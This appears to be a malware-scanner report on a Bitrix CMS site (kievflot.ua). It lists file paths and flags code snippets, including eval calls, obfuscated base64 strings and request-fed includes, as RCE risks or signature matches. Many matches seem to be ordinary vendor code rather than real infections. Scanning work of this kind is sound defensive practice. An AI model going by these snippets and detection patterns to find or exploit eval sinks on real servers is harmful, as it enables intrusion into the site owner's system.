create_function('$a, $b', 'if($a[1] == $b[1]) return 0; return ($a[1] < $b[1])? -1 : 1;')); $res = array(); foreach($this->__view[$view] as $item) $res[] = $item[0]; return implode($res); } public static function OnChangeFileComponent($path, $site) { global $APPLICATION; if(!HasScriptExtension($path)) return; $docRoot = CSite::GetSiteDocRoot($site); CUrlRewriter::Delete( array("SITE_ID" => $site, "PATH" => $path, "ID" => "NULL") ); if (class_exists("\\Bitrix\\Main\\Application", false)) { \Bitri...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("?>".$fTmp->GetContents()); } $FILE_PERM = $PERM[$path_file]; if(!is_array($FILE_PERM)) $FILE_PERM = array(); if(!$bOverWrite && count($FILE_PERM)>0) return true; $bDiff = false; $str="<?\n"; foreach($arPermissions as $group=>$perm) { if(strlen($perm) > 0) $str .= "\$PERM[\"".EscapePHPString($path_file)."\"][\"".EscapePHPString($group)."\"]=\"".EscapePHPString($perm)."\";\n"; if(!$bDiff) { $curr_perm = $FILE_PERM[$group]; if(!isset($curr_perm) && preg_match('/^G[0-9]+$/', $group)) $curr_per...
| Function posix_kill Warning Potentially dangerous function `posix_kill` [https://www.php.net/posix_kill] |
posix_kill(getmypid(), 9);')); define("BX_FORK_AGENTS_AND_EVENTS_FUNCTION_STARTED", true); global $DB, $CACHE_MANAGER; $CACHE_MANAGER = new CCacheManager; $DBHost = $DB->DBHost; $DBName = $DB->DBName; $DBLogin = $DB->DBLogin; $DBPassword = $DB->DBPassword; $DB = new CDatabase; $DB->Connect($DBHost, $DBName, $DBLogin, $DBPassword); $app = \Bitrix\Main\Application::getInstance(); if ($app != null) { $con = $app->getConnection(); if ($con != null) $con->connect(); } $DB->DoConnect(); $DB->StartUsin...
| Sign 11413268 Line: 1625 Dangerous Malware Signature (hash: 11413268) |
eval("?>
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_client.php Size: 249.86 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:52 Warns: 2 Dangers: 14
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'X1VwZGF0ZVN5c3RlbScpLCAwLCAxMDI0KTsKICAgICAgICAgICAgICAgICAgICBteV9yZXN1bHQ6PWRibXNfbG9jay5yZXF1ZXN0KG15X2xvY2tfaWQsIGRibXNfbG9jay54X21vZGUsIDAsIHRydWUpOwogICAgICAgICAgICAgICAgICAgIC0tICBSZXR1cm4gdmFsdWU6CiAgICAgICAgICAgICAgICAgICAgLS0gICAgMCAtIHN1Y2Nlc3MKICAgICAgICAgICAgICAgICAgICAtLSAgICAxIC0gdGltZW91dAogICAgICAgICAgICAgICAgICAgIC0tICAgIDIgLSBkZWFkbG9jawogICAgICAgICAgICAgICAgICAgIC0tICAgIDMgLSBwYXJhbWV0ZXIgZXJyb3IKICAgICAgICAgICAgICAgICAgICAtLSAgICA0IC0gYWxyZWFkeSBvd24gbG9jayBzcGVjaWZpZWQgYnk...
| Exploit execution Line: 1 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER[___504618485(2217)
| Exploit silenced_eval Line: 1 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval($GLOBALS['____1347154205'][1005](array('<?php', '<?', '?>')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($_267581649["#"]["cdata-section"][(910-2*455)]["#"]);} catch(Exception $_904795991){ $_1075876051= ___504618485(38).$_904795991->getCode().___504618485(39).$_904795991->getMessage();} $_143313344 .= ___504618485(40).$GLOBALS['____1347154205'][24]($_267581649[___504618485(41)][___504618485(42)]).___504618485(43).$GLOBALS['____1347154205'][25]($_1075876051);}} if(empty($_796463733)){ CUpdateClient::AddMessage2Log($GLOBALS['____1347154205'][26](___504618485(44), ___504618485(45), $_143313344))...
| Sign 7186bb8d Line: 1 Dangerous Malware Signature (hash: 7186bb8d) |
RlZmluZ
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) |
N5c3Rlb
| Sign 7f5d33bf Line: 1 Dangerous Malware Signature (hash: 7f5d33bf) |
JlcGxhY2
| Sign 91535293 Line: 1 Dangerous Malware Signature (hash: 91535293) |
luY2x1ZG
| Sign 99fc3b9d Line: 1 Dangerous Malware Signature (hash: 99fc3b9d) |
$GLOBALS['____
| Sign a408f408 Line: 1 Dangerous Malware Signature (hash: a408f408) |
c3RyX
| Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign d30fc49e Line: 1 Dangerous Malware Signature (hash: d30fc49e) |
b3Blb
| Sign d97f004d Line: 1 Dangerous Malware Signature (hash: d97f004d) |
ZXhlYy
| Sign de12c454 Line: 1 Dangerous Malware Signature (hash: de12c454) |
vcGVu
| Sign ee1cb326 Line: 1 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) |
'base64_decode'
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_list.php Size: 1.21 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("parent."+this.name+"_"+str);
}
catch(e){}
}
</script>
</head>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bgcolor="white">
<table width="100%" border="0" id="updates_items">
</table>
</body>
</html>
<? require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/epilog_after.php")
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/menu.php Size: 15.46 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ".$CONDITION.";"))) $bSkipMenuItem = true; } if(!$bSkipMenuItem) $ITEM_INDEX++; if(($pos = strpos($LINK, "?"))!==false) $ITEM_TYPE = "U"; elseif(substr($LINK, -1)=="/") $ITEM_TYPE = "D"; else $ITEM_TYPE = "P"; $SELECTED = false; if($bCached) { $all_links = $arMenuCache[$iMenuItem]["LINKS"]; if(!is_array($all_links)) $all_links = array(); } else { $all_links = array(); if(is_array($ADDITIONAL_LINKS)) { foreach($ADDITIONAL_LINKS as $link) { $tested_link = trim(Rel2Abs($this->MenuDir, ...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_class.php Size: 140.73 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 3
| Description | Match |
|---|
Exploit execution Line: 3798 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")
| Exploit silenced_eval Line: 3274 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval("\$path=".$str_fill_path_value_2.$path."((\$by=\"\")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$path=".$str_fill_path_value_2.$path."((\$by=\"\"),(\$order=\"\"),array(\"ACTIVE\"=>\"Y\"));\$cnt=0;while(\$ar_"."res=\$path->Fe"."tch())\$cnt++;"); return $cnt;} } public static function GetModuleVersion($module) { if (strlen($module)<=0) return false; $strModule_tmp_dir = $_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module; if (file_exists($strModule_tmp_dir) && is_dir($strModule_tmp_dir)) { if ($module != "main") { if (file_exists($strModule_tmp_dir."/install/index.php")) { $arModule_...
| Sign 696317c4 Line: 3274 Dangerous Malware Signature (hash: 696317c4) |
@eval("\
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_client_partner.php Size: 75.03 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/site_checker.php Size: 87.94 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 4
| Description | Match |
|---|
Exploit execution Line: 2845 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER['DOCUMENT_ROOT'].'/bitrix/license_key.php')
| Exploit execution Line: 2931 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/dbconn_error.php")
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec('catdoc -V', $output, $return_var); if ($return_var === 0) { $version = $output[0]; if (strpos($version, '0.94.4') !== false || strpos($version, '0.94.3') !== false) $strError .= GetMessage('MAIN_CATDOC_WARN', array('#VERSION#' => $version)); } } return $this->Result(false, $strError); } function check_fast_download() { $tmp = $_SERVER['DOCUMENT_ROOT'].'/bitrix/tmp/success.txt'; if (!CheckDirPath($tmp) || !file_put_contents($tmp, 'SUCCESS')) return $this->Result(false, GetMessage("MAIN_TMP_...
| Sign 471b95ee Line: 513 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
| Sign 471b95ee Line: 515 Dangerous Malware Signature (hash: 471b95ee) |
SUHOSIN
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/wizard_site.php Size: 40.55 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a["SORT"], $b["SORT"]);')); if (array_key_exists("GROUPS", $arWizardTemplates) && is_array($arWizardTemplates["GROUPS"])) $this->arTemplateGroups = $arWizardTemplates["GROUPS"]; } function __GetInstallationScript() { $instScript = $_SERVER["DOCUMENT_ROOT"].$this->path."/wizard.php"; if (!is_file($instScript)) return false; $this->pathToScript = $instScript; return true; } function __GetServices() { $serviceFile = $_SERVER["DOCUMENT_ROOT"].$this->path."/....
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/controller_member.php Size: 41.85 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 1076 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode($_REQUEST['parameters'])
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($disconnect_command); COption::SetOptionString("main", "controller_member", "N"); } public static function GetBackup($bRefresh = false) { static $arCachedData; if(!isset($arCachedData) || $bRefresh) $arCachedData = unserialize(COption::GetOptionString("main", "~controller_backup", "")); return $arCachedData; } public static function SetBackup($arBackup) { COption::SetOptionString("main", "~controller_backup", serialize($arBackup)); CControllerClient::GetBackup(true); } public static functio...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/mysql/database.php Size: 23.42 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 3
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/mysql/agent.php Size: 5.14 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$eval_result=".$arAgent["NAME"]); } catch (Exception $e) { CTimeZone::Enable(); $application = \Bitrix\Main\Application::getInstance(); $exceptionHandler = $application->getExceptionHandler(); $exceptionHandler->writeToLog($e); continue; } CTimeZone::Enable(); if ($logFunction) $logFunction($arAgent, "finish", $eval_result, $e); if($e === false) { continue; } elseif(strlen($eval_result)<=0) { $strSql = "DELETE FROM b_agent WHERE ID=".$arAgent["ID"]; } else { $strSql = "
UPDATE b_agen...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/spread.php Size: 1.34 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:52 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/public/top_panel.php Size: 54.78 kB Created: 2017-06-21 17:31:49 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/public/menu_edit.php Size: 21.81 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(\''.$out.'\');'; ?>
var arCellsHTML = [
'<span class="rowcontrol drag" title="<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_DRAG'))?>"></span>',
getAreaHTML('text_' + nums, '', '<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_TEXT_EDIT'))?>'),
getAreaHTML('link_' + nums, '', '<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_LINK_EDIT'))?>'),
'<span onclick="if (!GLOBAL_bDisableActions) {currentLink = \'' + nums + '\'; OpenFileBrowserWindFile_' + nums + '();}" class="rowcontrol...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin_tools.php Size: 23.88 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 3
| Description | Match |
|---|
Exploit execution Line: 180 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER['DOCUMENT_ROOT'].$root.$init."/.description.php")
| Exploit execution Line: 232 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$path_mod."/".$file_templ."/.description.php")
| Exploit execution Line: 266 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$path."/".$folder_name."/.description.php")
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$v1,$v2','if ($v1>$v2) return 1; elseif ($v1<$v2) return -1;')); return $arrTemplate; } } class CTemplates { public static function GetList($arFilter = array(), $arCurrentValues = array(), $template_id = array()) { if(!is_set($arFilter, "FOLDER")) { $arr = CTemplates::GetFolderList(); $arFilter["FOLDER"] = array_keys($arr); } $arTemplates = array(); foreach($arFilter["FOLDER"] as $folder) { $folder = _normalizePath($folder); $arTemplates[$folder] = array(); $arPath = array( "/bi...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/index.php Size: 649.00 B Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/checklist.php Size: 44.38 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(<?=$arStates;?>);
var DetailWindow = false;
var arMainStat ={
"REQUIRE":<?=$arStat["REQUIRE"];?>,
"REQUIRE_CHECK":<?=$arStat["REQUIRE_CHECK"];?>,
"FAILED":<?=$arStat["FAILED"];?>,
"SUCCESS":<?=$arStat["CHECK"];?>,
"SUCCESS_R":<?=$arStat["CHECK_R"];?>,
"TOTAL":<?=$arStat["TOTAL"];?>
};
var arRequireCount=<?=$arStat["REQUIRE"];?>;
var arRequireCheckCount=<?=$arStat["REQUIRE_CHECK"];?>;
var arFailedCount = <?=$arStat["FAILED"];?>;
var CanClose = "<?=$arCanClose;...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/user_admin.php Size: 23.85 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 69 Warning Double var technique is usually used for the obfuscation of malicious code |
${$f}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/settings.php Size: 11.09 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["SORT"] == $b["SORT"]) return strcasecmp($a["NAME"], $b["NAME"]); return ($a["SORT"] < $b["SORT"])? -1 : 1;')); $mid = $_REQUEST["mid"]; if($mid == "" || !isset($arModules[$mid]) || !file_exists($arModules[$mid]["PAGE"])) $mid = "main"; ob_start(); include($arModules[$mid]["PAGE"]); $strModuleSettingsTabs = ob_get_contents(); ob_end_clean(); $APPLICATION->SetTitle(GetMessage("MAIN_TITLE")); require_once ($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/pr...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/checklist_detail.php Size: 15.88 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 25 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/lang/".LANG."/admin/checklist.php")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("(" +data+")");
var show_result = false;
var buttons = BX.findChildren(BX('checklist-popup-tes-status'), {className:'checklist-popup-tes-status'});
if (json_data.STATUS || stoptest == true)
{
if (json_data.STATUS)
{
BX("show_detail_link").style.display = "none";
BX("detail_system_comment_<?=$jsTestID;?>").innerHTML = "";
currentStatus = json_data.STATUS;
RefreshCheckList(json_data);
for(var i=0; i<buttons.length; i++)
BX.removeCl...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/module_admin.php Size: 7.88 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["MODULE_SORT"] == $b["MODULE_SORT"]) return strcasecmp($a["MODULE_NAME"], $b["MODULE_NAME"]); return ($a["MODULE_SORT"] < $b["MODULE_SORT"])? -1 : 1;')); $fb = ($id == 'fileman' && !$USER->CanDoOperation('fileman_install_control')); if($isAdmin && !$fb && check_bitrix_sessid()) { if(strlen($_REQUEST["uninstall"])>0 || strlen($_REQUEST["install"])>0) { $id = str_replace("\\", "", str_replace("/", "", $id)); if($Module = CModule::CreateModuleObject($id)) { if($Modu...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/restore.php Size: 162.40 kB Created: 2017-06-21 17:31:49 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit execution Line: 701 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER['DOCUMENT_ROOT'].'/bitrix/license_key.php')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($l); } if ($DBName && !preg_match('#^\*+$#', $DBName)) { $strWarning .= '<li>'.getMsg('DBCONN_WARN'); $create_db = false; } else { $DBHost = 'localhost'.(file_exists($_SERVER['DOCUMENT_ROOT'].'/../BitrixEnv.exe') ? ':31006' : ''); $DBLogin = 'root'; $DBPassword = ''; $DBName = 'bitrix_'.(rand(11,99)); $create_db = "Y"; } } else { $DBHost = $_REQUEST["DBHost"]; $DBLogin = $_REQUEST["DBLogin"]; $DBPassword = $_REQUEST["DBPassword"]; $DBName = $_REQUEST["DBName"]; $create_db = $_REQUEST["creat...
| Sign 7830f7a6 Line: 1755 Dangerous Malware Signature (hash: 7830f7a6) |
NvcH
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/update_system_market.php Size: 29.34 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/checklist_report.php Size: 18.84 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 25 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/lang/".LANG."/admin/checklist.php")
| Function eval Line: 305 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(<?=$arStates;?>);
var Dialog = false;
var current = 0;
var next = 0;
var prev = 0;
var last_id = false;
function InitState()
{
var el = false;
for (var i=0;i<arStates["SECTIONS"].length;i++)
{
el = arStates["SECTIONS"][i];
if (el.CHECKED == "Y")
BX.addClass(BX(el.ID+"_name"),"checklist-testlist-green");
BX(el.ID+"_stat").innerHTML = "(<span class=\"checklist-testlist-passed-test\">"+el.CHECK+"</span>/"+el.TOTAL+")";
}
for (i=0;i<arStates["POINTS...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/main_controller.php Size: 8.74 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($oRequest->arParameters['join_command']); $oResponse->status = "200 OK"; } else { $oResponse->status = "472 Bad Request"; $oResponse->text = GetMessage("MAIN_ADM_CONTROLLER_ERR8"); } } elseif(!$oRequest->Check()) { $oResponse->status = "403 Access Denied"; $oResponse->text = "Access Denied"; } else { switch($oRequest->operation) { case "ping": $oResponse->status = "200 OK"; break; case "register": $ticket_id = COption::GetOptionString("main", "controller_ticket", ""); list($ticket_created, ...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/message_admin.php Size: 13.39 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 66 Warning Double var technique is usually used for the obfuscation of malicious code |
${$f}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/dump.php Size: 46.38 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(result))
counter_sec = regs[1];
}
}
function IncCounter()
{
window.setTimeout(IncCounter, 1000);
if (!counter_started)
return;
counter_sec ++;
var ob;
if (ob = BX('counter_field'))
{
var min = Math.floor(counter_sec / 60);
var sec = counter_sec % 60;
if (min < 10)
min = '0' + min;
if (sec < 10)
sec = '0' + sec;
ob.innerHTML = min + ':' + sec;
}
}
window.setTimeout(IncCounter, 1000);
function GetLicenseInfo()
{
CHttpRequest.Action = function(result)
{
BX('...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/partner_modules.php Size: 18.52 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["MODULE_SORT"] == $b["MODULE_SORT"]) return strcasecmp($a["MODULE_NAME"], $b["MODULE_NAME"]); return ($a["MODULE_SORT"] < $b["MODULE_SORT"])? -1 : 1;')); $stableVersionsOnly = COption::GetOptionString("main", "stable_versions_only", "Y"); $arRequestedModules = CUpdateClientPartner::GetRequestedModules(""); $arUpdateList = CUpdateClientPartner::GetUpdatesList($errorMessage, LANG, $stableVersionsOnly, $arRequestedModules, Array("fullmoduleinfo" => "Y")); $strError_...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/menu.php Size: 24.77 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["sort"] == $b["sort"]) return strcasecmp($a["text"], $b["text"]); return ($a["sort"] < $b["sort"])? -1 : 1;')); } } $settingsItems[] = array( "text" => GetMessage("MAIN_MENU_MODULE_SETTINGS"), "url" => "settings.php?lang=".LANGUAGE_ID, "title" => GetMessage("MAIN_MENU_SETTINGS_ALT"), "dynamic"=>true, "module_id"=>"main", "items_id"=>"menu_module_settings", "items"=>$aModuleItems, ); } if($USER->CanDoOperation('view_other_settings') || $USER->CanDoOperation('cache...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/php_command_line.php Size: 10.83 kB Created: 2017-06-21 17:31:49 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($query); ob_end_flush(); printf("<hr>".GetMessage("php_cmd_exec_time")." %0.6f", microtime(1) - $stime); } require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin_js.php"); die(); } $APPLICATION->SetTitle(GetMessage("php_cmd_title")); CJSCore::Init(array('ls')); if( $_SERVER['REQUEST_METHOD'] == 'POST' && $_POST["ajax"] === "y" && (isset($_POST["add"]) || $remove) ) { CUtil::JSPostUnescape(); require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_a...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/site_checker.php Size: 35.03 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 242 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode($_REQUEST['global_test_vars'])
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(result);
var oTable = BX('fix_table');
if (oRow = BX('in_progress'))
{
oCell = oRow.cells[1];
}
else
{
oRow = oTable.insertRow(-1);
oCell = oRow.insertCell(-1);
oCell.style.width = '40%';
oCell.innerHTML = strCurrentTestName;
oCell = oRow.insertCell(-1);
}
if (strResult == '')
{
oRow.setAttribute('id', 'in_progress');
oCell.innerHTML = '<div class="sc_progress" style="width:' + test_percent + '%">' + test_percent ...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/userfield_edit.php Size: 17.60 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(i);
if (r && r[1] > 0)
{
addNewRow('list_table');
}
}
});
});
//-->
</script>
<form method="POST" Action="<?echo $APPLICATION->GetCurPage()."?lang=".urlencode(LANG)?>" ENCTYPE="multipart/form-data" name="post_form">
<? $tabControl->Begin(); ?>
<? $tabControl->BeginNextTab(); ?>
<?if($ID):?>
<tr>
<td width="40%">ID:</td>
<td width="60%"><?=$ID?></td>
</tr>
<?endif?>
<tr class="adm-detail-required-field">
<td width="40%"><?=GetMessage("USERTYPE_USER_TYPE_ID")?>:</...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/group_edit.php Size: 28.92 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("document.form1.USER_ID_FROM_" + id);
var ed1 = eval("document.form1.USER_ID_TO_" + id);
ed.disabled = !obj.checked;
ed1.disabled = !obj.checked;
}
</script>
<? $ind = -1; $dbUsers = CUser::GetList(($b="id"), ($o="asc"), array("ACTIVE" => "Y")); while ($arUsers = $dbUsers->Fetch()) { $ind++; ?>
<tr>
<td>
<input type="hidden" name="USER_ID_<?=$ind?>" value="<?=$arUsers["ID"] ?>">
<input type="checkbox" name="USER_ID_ACT_<?=$ind?>" id="USER_ID_ACT_ID_...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/dump_list.php Size: 15.63 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(result);
PartDownload();
}
CHttpRequest.Send(url);
}
function PartDownload()
{
if (!links || links.length == 0)
return;
var link = links.pop();
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = link;
document.body.appendChild(iframe);
window.setTimeout(PartDownload, 10000);
}
function EndDump()
{
}
</script>
<div id="dump_result_div"></div>
<? $lAdmin->DisplayList(); echo BeginNote(); echo GetMessage("MAIN_DUMP_HEAD...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/tools/upload.php Size: 984.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/tools.php Size: 166.27 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 2
| Description | Match |
|---|
